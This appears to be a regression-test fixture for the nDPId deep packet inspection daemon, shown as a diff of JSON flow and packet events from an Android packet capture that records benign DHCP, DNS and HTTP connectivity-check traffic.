00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="}
00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454784313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454784313,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDQAAP8RQnEAAAAA\/\/\/\/\/wBEAEMBNI1GAQEGAHhURwsAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454786281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454786281,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDUAAP8RQnAAAAAA\/\/\/\/\/wBEAEMBNI1EAQEGAHhURwsAAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="}
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454789207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454789207,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDYAAP8RQm8AAAAA\/\/\/\/\/wBEAEMBNI1BAQEGAHhURwsABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454792980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454792980,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIangkAAEARVHnAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"}
@@ -67,11 +67,11 @@
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454867075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454867075,"pkt":"TGr2n\/YnxiwDYGpkCABFAADPTgIAAEARprrAqAIBwKgCEAA1ztkAu4V++6aBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABCKACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAACCAA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAVQAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEwAEEf01ycB\/AAEAAQAAABMABBH9NdA="}
00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454867075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.53.201"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"}
00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867151,"flow_last_seen":1582454867151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867151,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1582454867151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867151,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SJ9AAEAG557AqAIQEf01yePiAFBF7HpxAAAAAKAC\/\/9mAgAAAgQFtAQCCAr\/\/zLuAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1582454867184,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867184,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AAAAADQGfD4R\/TXJwKgCEABQ4+KuJAPnRex6cqAScNDonAAAAgQFrAQCCAp2SOQ3\/\/8y7gEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1582454867186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454867186,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SKBAAEAG56XAqAIQEf01yePiAFBF7HpyriQD6IAQAVeG0QAAAQEICv\/\/Mvh2SOQ3"}
00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867151,"flow_last_seen":1582454867196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454867196,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.3112.32 Safari\/537.36"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454867244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454867244,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qTJAAEARDBvAqAIQwKgCAYvxADUAKg90oPQBAAABAAAAAAAABHRpbWUHYW5kcm9pZANjb20AAAEAAQ=="}
00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867244,"flow_last_seen":1582454867244,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454867244,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"time.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -86,134 +86,134 @@
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867637,"flow_last_seen":1582454867637,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454867637,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454867639,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454867639,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRpSEAAEARUBnAqAIBwKgCEAA1huwAPTVyr3qBgAABAAEAAAAACGNsaWVudHMxBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867639,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"clients1.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867688,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454867688,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1582454867688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454867688,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8oxlAAEAG1YLAqAIQ2O8meIDOAbtPCpBsAAAAAKAC\/\/\/waQAAAgQFtAQCCAr\/\/zN1AAAAAAEDAwg="}
